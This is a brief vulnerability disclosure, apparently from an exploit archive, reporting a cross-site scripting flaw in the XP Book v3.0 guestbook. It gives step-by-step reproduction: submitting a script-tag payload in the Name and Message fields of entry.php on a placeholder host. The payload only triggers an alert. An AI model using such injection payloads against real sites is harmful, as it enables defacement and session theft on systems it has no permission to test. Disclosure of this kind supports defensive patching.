XP Book version 3.0 suffers from a cross site scripting vulnerability.
bd052974bd1129d8a0fa1c29dc9b64454ebcc4d23446d7b6786ba736672d2ec1
Hello ,
I haven't send any new bugs for long time :)
Vulnerable : XP Book v3.0
coded by http://kuwaitiphp.alruban.net
* i think their website doesn't work at the moment
exploit :
open http://www.example.com/xpbook/entry.php
then type in
Name:
'><script>alert(xss);</script>
Email :
whatever@whatever.com
Message :
'><script>alert(xss);</script>
then press Send ! and the code that we typed is going to work !
discovered by / Linux_Drox
www.LeZr.Com
Best regards ,